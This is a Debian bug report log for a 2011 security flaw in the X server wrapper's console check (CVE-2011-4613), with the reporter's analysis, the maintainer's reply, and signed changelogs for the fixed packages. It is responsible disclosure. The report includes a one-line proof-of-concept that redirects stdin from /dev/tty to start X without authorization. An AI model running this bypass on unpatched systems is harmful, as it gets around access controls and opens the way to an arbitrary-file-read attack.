Package: xserver-xorg; Maintainer for xserver-xorg is Debian X Strike Force <debian-x@lists.debian.org>; Source for xserver-xorg is src:xorg (PTS, buildd, popcon).
Reported by: vladz <vladz@devzero.fr>
Date: Thu, 15 Dec 2011 18:06:02 UTC
Severity: important
Tags: security
Found in version xorg/1:7.5+8
Fixed in versions xorg/1:7.6+10, xorg/1:7.5+8+squeeze1
Done: Julien Cristau <jcristau@debian.org>
Bug is archived. No further changes may be made.
View this report as an mbox folder, status mbox, maintainer mbox
Report forwarded
to debian-bugs-dist@lists.debian.org, Debian X Strike Force <debian-x@lists.debian.org>
:
Bug#652249
; Package xserver-xorg
.
(Thu, 15 Dec 2011 18:06:05 GMT) (full text, mbox, link).
Acknowledgement sent
to vladz <vladz@devzero.fr>
:
New Bug report received and forwarded. Copy sent to Debian X Strike Force <debian-x@lists.debian.org>
.
(Thu, 15 Dec 2011 18:06:05 GMT) (full text, mbox, link).
Message #5 received at submit@bugs.debian.org (full text, mbox, reply):
Package: xserver-xorg Version: 1:7.5+8 Severity: important Tags: security By default, the wrapper's configuration file only allows any user whose controlling TTY (console) to start the X server with root privileges: # cat /etc/X11/Xwrapper.config [...] allowed_users=console To determine if a user is controlling a TTY, the code checks the properties of the file connected to its standard input: $ cat -n debian/local/xserver-wrapper.c [...] 152 static int 153 onConsole() 154 { 155 #if defined(__linux__) 156 struct stat s; 157 158 /* see if stdin is a virtual console device */ 159 if (fstat(0, &s) != 0) { 160 (void) fprintf(stderr, "X: cannot stat stdin\n"); 161 return FALSE; 162 } 163 if (S_ISCHR(s.st_mode) && 164 ((((s.st_rdev >> 8) & 0xff) == TTY_MAJOR_DEV && 165 (s.st_rdev & 0xff) < 64) || 166 (((s.st_rdev >> 8) & 0xff) == ALT_TTY_MAJOR_DEV && 167 (s.st_rdev & 0xff) < 64) 168 )) { 169 return TRUE; 170 } As seen, this is done by checking if this file: - is a character device [line 163] - has a TTY-specific major number (TTY_MAJOR_DEV or ALT_TTY_MAJOR_DEV, respectively 4 or 5) [lines 164, 166] - has a minor number lower than 64 [lines 165, 167] Unfortunately, by connecting a file with similar properties to its stdin, a user can mislead the X wrapper and launch the X server. This file also needs to be readable by the user. For instance, files "/dev/tty" and "/dev/ptmx" match those conditions: $ ls -l /dev/tty /dev/ptmx crw-rw-rw- 1 root root 5, 2 14 déc. 18:43 /dev/ptmx crw-rw-rw- 1 root root 5, 0 12 déc. 23:03 /dev/tty Here is a quick PoC by using "/dev/tty": $ ssh remote_host $ id uid=1000(vladz) gid=1000(vladz) groups=1000(vladz) $ tty /dev/pts/4 // not a TTY, won't have sufficient permissions to start X $ X :1 X: user not authorized to run the X server, aborting. // This was the expected result, now lets connect "/dev/tty" to stdin and // retry... $ exec 0</dev/tty; X :1; exec 0</dev/pts/4 [... Xorg starts ...] // start succeed! This being said, this is a minor issue, but the attack against CVE-2011-4029[1] which allows to set the read permission on any arbitrary file, can now be launched from remote sessions and not even from a TTY. It become urgent to fix it. [1] http://security-tracker.debian.org/tracker/CVE-2011-4029 Thanks, vladz. -- http://vladz.devzero.fr PGP key 8F7E2D3C from pgp.mit.edu
Information forwarded
to debian-bugs-dist@lists.debian.org, Debian X Strike Force <debian-x@lists.debian.org>
:
Bug#652249
; Package xserver-xorg
.
(Thu, 15 Dec 2011 18:42:02 GMT) (full text, mbox, link).
Acknowledgement sent
to Julien Cristau <jcristau@debian.org>
:
Extra info received and forwarded to list. Copy sent to Debian X Strike Force <debian-x@lists.debian.org>
.
(Thu, 15 Dec 2011 18:42:02 GMT) (full text, mbox, link).
Message #10 received at 652249@bugs.debian.org (full text, mbox, reply):
On Thu, Dec 15, 2011 at 19:02:36 +0100, vladz wrote: > > Package: xserver-xorg > Version: 1:7.5+8 > Severity: important > Tags: security > > > By default, the wrapper's configuration file only allows any user whose > controlling TTY (console) to start the X server with root privileges: > > # cat /etc/X11/Xwrapper.config > [...] > allowed_users=console > > To determine if a user is controlling a TTY, the code checks the > properties of the file connected to its standard input: > > $ cat -n debian/local/xserver-wrapper.c > [...] > 152 static int > 153 onConsole() > 154 { > 155 #if defined(__linux__) > 156 struct stat s; > 157 > 158 /* see if stdin is a virtual console device */ > 159 if (fstat(0, &s) != 0) { > 160 (void) fprintf(stderr, "X: cannot stat stdin\n"); > 161 return FALSE; > 162 } > 163 if (S_ISCHR(s.st_mode) && > 164 ((((s.st_rdev >> 8) & 0xff) == TTY_MAJOR_DEV && > 165 (s.st_rdev & 0xff) < 64) || > 166 (((s.st_rdev >> 8) & 0xff) == ALT_TTY_MAJOR_DEV && > 167 (s.st_rdev & 0xff) < 64) > 168 )) { > 169 return TRUE; > 170 } > > As seen, this is done by checking if this file: > > - is a character device [line 163] > - has a TTY-specific major number (TTY_MAJOR_DEV or ALT_TTY_MAJOR_DEV, > respectively 4 or 5) [lines 164, 166] > - has a minor number lower than 64 [lines 165, 167] > > Unfortunately, by connecting a file with similar properties to its > stdin, a user can mislead the X wrapper and launch the X server. This > file also needs to be readable by the user. > > For instance, files "/dev/tty" and "/dev/ptmx" match those conditions: > > $ ls -l /dev/tty /dev/ptmx > crw-rw-rw- 1 root root 5, 2 14 déc. 18:43 /dev/ptmx > crw-rw-rw- 1 root root 5, 0 12 déc. 23:03 /dev/tty > > Here is a quick PoC by using "/dev/tty": > > $ ssh remote_host > $ id > uid=1000(vladz) gid=1000(vladz) groups=1000(vladz) > $ tty > /dev/pts/4 // not a TTY, won't have sufficient permissions to start X > $ X :1 > X: user not authorized to run the X server, aborting. > > // This was the expected result, now lets connect "/dev/tty" to stdin and > // retry... > > $ exec 0</dev/tty; X :1; exec 0</dev/pts/4 > [... Xorg starts ...] // start succeed! > > This being said, this is a minor issue, but the attack against > CVE-2011-4029[1] which allows to set the read permission on any arbitrary > file, can now be launched from remote sessions and not even from a TTY. It > become urgent to fix it. > Seems like we should revert the change accepting major 5 for stdin? Cheers, Julien
Reply sent
to Julien Cristau <jcristau@debian.org>
:
You have taken responsibility.
(Thu, 15 Dec 2011 23:06:10 GMT) (full text, mbox, link).
Notification sent
to vladz <vladz@devzero.fr>
:
Bug acknowledged by developer.
(Thu, 15 Dec 2011 23:06:10 GMT) (full text, mbox, link).
Message #15 received at 652249-close@bugs.debian.org (full text, mbox, reply):
Source: xorg Source-Version: 1:7.6+10 We believe that the bug you reported is fixed in the latest version of xorg, which is due to be installed in the Debian FTP archive: x11-common_7.6+10_all.deb to main/x/xorg/x11-common_7.6+10_all.deb xbase-clients_7.6+10_all.deb to main/x/xorg/xbase-clients_7.6+10_all.deb xorg-dev_7.6+10_all.deb to main/x/xorg/xorg-dev_7.6+10_all.deb xorg_7.6+10.dsc to main/x/xorg/xorg_7.6+10.dsc xorg_7.6+10.tar.gz to main/x/xorg/xorg_7.6+10.tar.gz xorg_7.6+10_amd64.deb to main/x/xorg/xorg_7.6+10_amd64.deb xserver-xorg-input-all_7.6+10_amd64.deb to main/x/xorg/xserver-xorg-input-all_7.6+10_amd64.deb xserver-xorg-video-all_7.6+10_amd64.deb to main/x/xorg/xserver-xorg-video-all_7.6+10_amd64.deb xserver-xorg_7.6+10_amd64.deb to main/x/xorg/xserver-xorg_7.6+10_amd64.deb xutils_7.6+10_all.deb to main/x/xorg/xutils_7.6+10_all.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 652249@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Julien Cristau <jcristau@debian.org> (supplier of updated xorg package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmaster@debian.org) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Format: 1.8 Date: Thu, 15 Dec 2011 23:45:48 +0100 Source: xorg Binary: x11-common xserver-xorg xserver-xorg-video-all xserver-xorg-input-all xorg xorg-dev xbase-clients xutils Architecture: source all amd64 Version: 1:7.6+10 Distribution: unstable Urgency: high Maintainer: Debian X Strike Force <debian-x@lists.debian.org> Changed-By: Julien Cristau <jcristau@debian.org> Description: x11-common - X Window System (X.Org) infrastructure xbase-clients - miscellaneous X clients - metapackage xorg - X.Org X Window System xorg-dev - X.Org X Window System development libraries xserver-xorg - X.Org X server xserver-xorg-input-all - X.Org X server -- input driver metapackage xserver-xorg-video-all - X.Org X server -- output driver metapackage xutils - X Window System utility programs metapackage Closes: 652249 Changes: xorg (1:7.6+10) unstable; urgency=high . * Fixes for xserver-wrapper: - when we drop privileges, don't forget to also reset effective group id, since we're installed setgid root. - revert change to allow devices with major 5 as consoles. This includes things like /dev/tty and /dev/ptmx, which are world-readable (closes: #652249). Thanks to vladz for the report. - use major() and minor() macros instead of manually extracting them * Build the X wrapper with hardening enabled. Checksums-Sha1: 2196ed48dae6b3e1e72696aae107b539b0ac169e 1957 xorg_7.6+10.dsc de885202dfb37d4100a8cd3759d1108fa54e5740 921591 xorg_7.6+10.tar.gz 98c2cf4894b3cbfde9fe2612dd3989b16e412e13 281478 x11-common_7.6+10_all.deb 81d698f4b3b323bd103c1fd5207ea9c96879eef6 34776 xorg-dev_7.6+10_all.deb e446612478c7fb27c0336146172f53a7a6f2b913 34638 xbase-clients_7.6+10_all.deb 9c71eff492af5c805d071fe36cfb53a93629139c 34528 xutils_7.6+10_all.deb 3ff678e1537cef7c5dcb1fdb23e92544fa14b301 111386 xserver-xorg_7.6+10_amd64.deb 4af8ca6f07c86b1ae3fab07963c341fe0033548a 34606 xserver-xorg-video-all_7.6+10_amd64.deb f490a88bb2edad11d9ab66ddb2bbbe5080ffe783 34478 xserver-xorg-input-all_7.6+10_amd64.deb c98cb08ac28db1b8ecfb6cbc344624c131cce6ff 35122 xorg_7.6+10_amd64.deb Checksums-Sha256: 5802dace6624fd02624ca98d1191ac0c1de986577da195bc3c25f9359309f945 1957 xorg_7.6+10.dsc 2123aa5a12f31cc56d12cf67716eb02c02cd8e95793dc6f661f1a3e00d466974 921591 xorg_7.6+10.tar.gz fc9fca55f8dc298acbbfa9640d554efc249c2fa4bc71e38885c56afcc9b00123 281478 x11-common_7.6+10_all.deb f3e55883b5da0fb381ec18b230040ab19315319c5fe156a9d89520869993afde 34776 xorg-dev_7.6+10_all.deb 0252457262d8c955377c42ea1dec7d97a4b12e00031151ad28e2cfac9c256b11 34638 xbase-clients_7.6+10_all.deb 39c3d231240f7d636543f6ebed29861198c32495c29b779e6927dade882bf04e 34528 xutils_7.6+10_all.deb e19c64f5b9cb17cb86438da654235b73b7cac3def9540fbe892fd36b1d4d8824 111386 xserver-xorg_7.6+10_amd64.deb 846298148fc63a1c5ce9aa552192334823c0add046b0b384ef4041da29b93c73 34606 xserver-xorg-video-all_7.6+10_amd64.deb b4e2313bcb64437d28337a4bdf0b0402b6dbb76b2014d32fcf9007150a0806bf 34478 xserver-xorg-input-all_7.6+10_amd64.deb 0a6ac501e7050e66fec8f30d22f16d352321bbf841649899b894c326b01364be 35122 xorg_7.6+10_amd64.deb Files: ba63e983debfcf60258ee60e1ad79bd0 1957 x11 optional xorg_7.6+10.dsc b734930a36f3c79ac96a90b3a7840232 921591 x11 optional xorg_7.6+10.tar.gz 4d05a329f927f662ef467f3e047e72f3 281478 x11 optional x11-common_7.6+10_all.deb 1e8056b6b758c17c1c55be14f145b02b 34776 x11 optional xorg-dev_7.6+10_all.deb 6fa485d19dc0378a1a306dabc7b9ac5c 34638 x11 optional xbase-clients_7.6+10_all.deb 675ff3dd6dbd9a6c7c32af8203f470de 34528 x11 optional xutils_7.6+10_all.deb 0afb6dec98541982337d59746c931561 111386 x11 optional xserver-xorg_7.6+10_amd64.deb 1e8cc78f2054d856209478ef5080d614 34606 x11 optional xserver-xorg-video-all_7.6+10_amd64.deb fb7b9678b2af8d14dab4238c1babc587 34478 x11 optional xserver-xorg-input-all_7.6+10_amd64.deb f65fd8c47c310ff17db166e8aec31c1d 35122 x11 optional xorg_7.6+10_amd64.deb -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iQIcBAEBCAAGBQJO6np8AAoJEDEBgAUJBeQM13kP/j0q1FS+M98AP6VthtnH6D3I tlArNDIo6KblTtPHltcYLPKsGxc+DoT1pWh4Hsdf59LSsQF53uNUWp3YFL1pgCgX AmEIGw0JeVzZ1TDyLjh/+lVGWt2GDncvXXMHF4Kfd5YYoVe4VTPxmcgq6Bv/DMHG 8Fuc4xd5fFpret+FuK+rK/yx3pCyZM2A1wrzy45sg7VrIAOnayNsJmvQ3K91eNIE m9rWCDzgtbyS6nSy7IEVOwQi3b2bVraHOy/wM0BRs0FejJa2wG1cAv7J/0/i8gq2 vXvEO9HsEFK+IsFBKHKUUC3nMI7D6lsm7WjR1dZmR+dmfRTWgJRVBmQp8GuTg4BA Zf9TnClZld15Nc/rt/vbHk2d3QfPvp1N+W//w818qLl8tte8lJBSYdFzab4+CTa2 46ar5ph4BqnMu2vKXwP3POPDPpP5wrXFBag1qI3F9inVBEgXihj1VuaQEuPZaUfP R4eYy+K4gt+vUo6w+ekrhLg8pOeBLx2PXqylOYph4uM7RIt8dCv+KBYB40UqlbXa 8R53DKv/H7+p4DXs5/Ty4HfsHPUIMYCaMOSGn/Pwgp0V8CmCEDVxEzZcAfD35xsk gLkGNxC5RypbqOfD8fowCG87zI6EDQa0SZr5WJ15sD52CUbnajXBoPtii2EMqPGO kU/Lu2JKXLs/vpAY09uD =yXZj -----END PGP SIGNATURE-----
Reply sent
to Julien Cristau <jcristau@debian.org>
:
You have taken responsibility.
(Mon, 19 Dec 2011 20:06:33 GMT) (full text, mbox, link).
Notification sent
to vladz <vladz@devzero.fr>
:
Bug acknowledged by developer.
(Mon, 19 Dec 2011 20:06:34 GMT) (full text, mbox, link).
Message #20 received at 652249-close@bugs.debian.org (full text, mbox, reply):
Source: xorg Source-Version: 1:7.5+8+squeeze1 We believe that the bug you reported is fixed in the latest version of xorg, which is due to be installed in the Debian FTP archive: libglu1-xorg-dev_7.5+8+squeeze1_all.deb to main/x/xorg/libglu1-xorg-dev_7.5+8+squeeze1_all.deb libglu1-xorg_7.5+8+squeeze1_all.deb to main/x/xorg/libglu1-xorg_7.5+8+squeeze1_all.deb x11-common_7.5+8+squeeze1_all.deb to main/x/xorg/x11-common_7.5+8+squeeze1_all.deb xbase-clients_7.5+8+squeeze1_all.deb to main/x/xorg/xbase-clients_7.5+8+squeeze1_all.deb xlibmesa-gl-dev_7.5+8+squeeze1_all.deb to main/x/xorg/xlibmesa-gl-dev_7.5+8+squeeze1_all.deb xlibmesa-gl_7.5+8+squeeze1_all.deb to main/x/xorg/xlibmesa-gl_7.5+8+squeeze1_all.deb xlibmesa-glu_7.5+8+squeeze1_all.deb to main/x/xorg/xlibmesa-glu_7.5+8+squeeze1_all.deb xorg-dev_7.5+8+squeeze1_all.deb to main/x/xorg/xorg-dev_7.5+8+squeeze1_all.deb xorg_7.5+8+squeeze1.dsc to main/x/xorg/xorg_7.5+8+squeeze1.dsc xorg_7.5+8+squeeze1.tar.gz to main/x/xorg/xorg_7.5+8+squeeze1.tar.gz xorg_7.5+8+squeeze1_amd64.deb to main/x/xorg/xorg_7.5+8+squeeze1_amd64.deb xserver-xorg-input-all_7.5+8+squeeze1_amd64.deb to main/x/xorg/xserver-xorg-input-all_7.5+8+squeeze1_amd64.deb xserver-xorg-video-all_7.5+8+squeeze1_amd64.deb to main/x/xorg/xserver-xorg-video-all_7.5+8+squeeze1_amd64.deb xserver-xorg_7.5+8+squeeze1_amd64.deb to main/x/xorg/xserver-xorg_7.5+8+squeeze1_amd64.deb xutils_7.5+8+squeeze1_all.deb to main/x/xorg/xutils_7.5+8+squeeze1_all.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 652249@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Julien Cristau <jcristau@debian.org> (supplier of updated xorg package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmaster@debian.org) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Format: 1.8 Date: Fri, 16 Dec 2011 19:54:40 +0100 Source: xorg Binary: x11-common xserver-xorg xserver-xorg-video-all xserver-xorg-input-all xorg xorg-dev xlibmesa-gl xlibmesa-gl-dev xlibmesa-glu libglu1-xorg libglu1-xorg-dev xbase-clients xutils Architecture: source all amd64 Version: 1:7.5+8+squeeze1 Distribution: squeeze-security Urgency: low Maintainer: Debian X Strike Force <debian-x@lists.debian.org> Changed-By: Julien Cristau <jcristau@debian.org> Description: libglu1-xorg - transitional package for Debian etch libglu1-xorg-dev - transitional package for Debian etch x11-common - X Window System (X.Org) infrastructure xbase-clients - miscellaneous X clients - metapackage xlibmesa-gl - transitional package for Debian etch xlibmesa-gl-dev - transitional package for Debian etch xlibmesa-glu - transitional package for Debian etch xorg - X.Org X Window System xorg-dev - the X.Org X Window System development libraries xserver-xorg - the X.Org X server xserver-xorg-input-all - the X.Org X server -- input driver metapackage xserver-xorg-video-all - the X.Org X server -- output driver metapackage xutils - X Window System utility programs metapackage Closes: 652249 Changes: xorg (1:7.5+8+squeeze1) squeeze-security; urgency=low . * xserver-wrapper: when we drop privileges, don't forget to also reset effective group id, since we're installed setgid root. * xserver-wrapper: revert change to allow devices with major 5 as consoles. This includes things like /dev/tty and /dev/ptmx, which are world-readable (closes: #652249). Thanks to vladz for the report. Reference: CVE-2011-4613. Checksums-Sha1: bc3a37ba340e33838de526532de596f2ebc8be09 1723 xorg_7.5+8+squeeze1.dsc 45f77ccadf67b5f0916a728c249ca35ba2b2cb7c 904376 xorg_7.5+8+squeeze1.tar.gz 03038cf51249488bb57578e1a8e06501b4ee909a 279090 x11-common_7.5+8+squeeze1_all.deb 4aa7668799797da4769486d2eca857334d32a9c7 32156 xorg-dev_7.5+8+squeeze1_all.deb c92aa9119f41a62e2e8f84f248820527fbb286d5 31782 xlibmesa-gl_7.5+8+squeeze1_all.deb 39dc858407db6f42db407c239173c883cfe08d15 31790 xlibmesa-gl-dev_7.5+8+squeeze1_all.deb 4fa6dd6c9398dcef6ee7b17eef78a25ed496bf13 31784 xlibmesa-glu_7.5+8+squeeze1_all.deb 9e70ecf6f59e4c0ce172b7d2734bc339c993745b 31776 libglu1-xorg_7.5+8+squeeze1_all.deb 5b50a7965b2ca80a614478b5ac9000905b74cfb8 31786 libglu1-xorg-dev_7.5+8+squeeze1_all.deb 399a20912be70af0a96af11a0fb8431f1ae619c4 38160 xbase-clients_7.5+8+squeeze1_all.deb 0c20f2c7b271da994fe9b38109d1bd69f7ea36eb 38282 xutils_7.5+8+squeeze1_all.deb 21f55c87b9f2c1360d965309aa8c2558977dcfd1 53346 xserver-xorg_7.5+8+squeeze1_amd64.deb de74121fc1b4605010900e9faf8f62b2b6f18f7d 31982 xserver-xorg-video-all_7.5+8+squeeze1_amd64.deb 5dfa6c3a0252df8bcb33668cf571c85628446813 31842 xserver-xorg-input-all_7.5+8+squeeze1_amd64.deb 26c9bb033de84e0993a9b2a6c591160465f69dd5 32472 xorg_7.5+8+squeeze1_amd64.deb Checksums-Sha256: d25ce5d7c2684b351498b7646fa877a46eb04329b2a4805f807238545b02ac96 1723 xorg_7.5+8+squeeze1.dsc e0be32e3167ad06cad4519c39c4f6ee3540530ff07b7d93975f5fe3d696bffb8 904376 xorg_7.5+8+squeeze1.tar.gz 965449a985f6cfd8b8b854046b53047a7c3a62df3f2c867ca929f14eacca585e 279090 x11-common_7.5+8+squeeze1_all.deb ab8004a7ba7b56fcdf312d7992912bf58f7f4f5468391af6d524565cd32b437c 32156 xorg-dev_7.5+8+squeeze1_all.deb 73a93438930a96d9bee84f19eda300d0760cd5b8208611fae44cca31b0a0731b 31782 xlibmesa-gl_7.5+8+squeeze1_all.deb 36c4a7f71e02eba425e67840726147cabad63cd8e1506294536b28df99c5abbe 31790 xlibmesa-gl-dev_7.5+8+squeeze1_all.deb 63bb7c2daa049f0f6e85ff5547fba11df7f95c048d6e0c43f3a0bf9827a00ab4 31784 xlibmesa-glu_7.5+8+squeeze1_all.deb b3649f36648bfc3826be26d1e169b1b73e57bdbfa40fddda1944e399e224382e 31776 libglu1-xorg_7.5+8+squeeze1_all.deb dc06e7321eba68a1353b4afd185e5fd9ab6c1c3bdfe7b1e90a580353fb70a2e2 31786 libglu1-xorg-dev_7.5+8+squeeze1_all.deb 24bcdeb2f32d99bad416e2cc4df5a4ac7f343fa42dacd865fdb36854eb064c66 38160 xbase-clients_7.5+8+squeeze1_all.deb 5d92fb6972889869bca9a7fa213e7975465f8a58cbd40433f98a91a8b84bf463 38282 xutils_7.5+8+squeeze1_all.deb 40dcea675bfb0e8b774bc619489ff0a6bb6a4f6ecc907e8ac0df409874151f59 53346 xserver-xorg_7.5+8+squeeze1_amd64.deb 2a9a5c0165aa8ff8f198d9799052d80928f7e53e548b83a720327fe350c86fcf 31982 xserver-xorg-video-all_7.5+8+squeeze1_amd64.deb ceb094261514e4a7f116c0cf19b5a7273c84d561888aad5552e226737ff58470 31842 xserver-xorg-input-all_7.5+8+squeeze1_amd64.deb 9326fc8ac9412efff7282df84e8eb38b26257ca882bdc0e00ded3c7e7a2b51a7 32472 xorg_7.5+8+squeeze1_amd64.deb Files: 3cd534237d55ad4f8c7062191e904594 1723 x11 optional xorg_7.5+8+squeeze1.dsc 98b9112b39d912d8ad47dd8b1dd79196 904376 x11 optional xorg_7.5+8+squeeze1.tar.gz 9216f776a019d5103a977a291e3de514 279090 x11 optional x11-common_7.5+8+squeeze1_all.deb d9deb044f125e25aabf373c5bf647f68 32156 x11 optional xorg-dev_7.5+8+squeeze1_all.deb 0294b0af7c57926ec5f9012a31c757ad 31782 libs optional xlibmesa-gl_7.5+8+squeeze1_all.deb 0f1953abe8cea198dc1d470aa87e87d5 31790 libdevel optional xlibmesa-gl-dev_7.5+8+squeeze1_all.deb 10da38d17bf016882c434b61b3ad0777 31784 libdevel optional xlibmesa-glu_7.5+8+squeeze1_all.deb 27f3bd0703ce6b6f761ea6ee88e61111 31776 libs optional libglu1-xorg_7.5+8+squeeze1_all.deb 287484cc07759d54613991d7777b0020 31786 libdevel optional libglu1-xorg-dev_7.5+8+squeeze1_all.deb 4468dd932eb869a5305012f2b63288cc 38160 x11 optional xbase-clients_7.5+8+squeeze1_all.deb e668ce5c7ac04f99a41e79f980ba0cde 38282 x11 optional xutils_7.5+8+squeeze1_all.deb 06ed8bf8f1fa98045d7da9ddd8841f8c 53346 x11 optional xserver-xorg_7.5+8+squeeze1_amd64.deb 0e7ebb1d0a9c6b84726ffd9ffb6201e2 31982 x11 optional xserver-xorg-video-all_7.5+8+squeeze1_amd64.deb 57a5e745409702538307667b5e85de5c 31842 x11 optional xserver-xorg-input-all_7.5+8+squeeze1_amd64.deb 262c750810336394ce0773385c3c852f 32472 x11 optional xorg_7.5+8+squeeze1_amd64.deb -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iQIcBAEBCAAGBQJO65ScAAoJEDEBgAUJBeQMdB0P/idw5Y/BLNYhxoAQxqAOYWvl WpFzhbb33e6tHeOByCNFtiT6JeWT4ms3K4x71q7BQOBcmcjMP5ao3haNhv1KJ/9p dATZ8L0vof0oiEqTiSQjZ9q3Q3jKtd2L101Sk0ZZHe9CZ/41PtqkzYnBv0dpQPOH O6qNhhlXzeV0HLG5Cap4hmJ9NvmyH0uAg7fwKocOLyyRGWgPCDi2p4V59545ycEQ 9NqXfyr1IGaft7xmyvRJJ0YD/h4HZPmKksfnqHpD6IliSL1NNB/ayRKIdB0kFf3r A+YreynPz+vWdvxsyDq2DFuynrpg5bSQQwja/3PI1vuVpgslGl4CB12Mh+KqxaD3 eZNNkhV7VcitrwCM9ua9Fe6BwTX9/tDhFOIGEFx4111SEMFDEVYtTgd965Mqjg6X jwXgbaGJ6WMVLiO0iHZ8LOHZhZE7qxxiSYGxH19veMqa2IfBZVavAR5x7yQ2T9Qv Wbm3OajGru4+vxc3GU5I+SLs5V2flqU6KYo+mNU3zvI/4xnIylz5akPx988amIsG aciES+5rjvGlT/JPRG5FPEwqqOpm3VmzM7sDP/vPQUH1EPdTX6U+XW9eJZBYDCkr 4nBV2Mx4QLw1MiSzTKcwXG57un7d9lohAjCvjv/YJqqyduUXcQ+3ZqvddTy20Ijj ATCh9CJimEfY/WWWS4y3 =Gayj -----END PGP SIGNATURE-----
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org
.
(Wed, 18 Jan 2012 07:36:02 GMT) (full text, mbox, link).
Send a report that this bug log contains spam.
Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.
Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.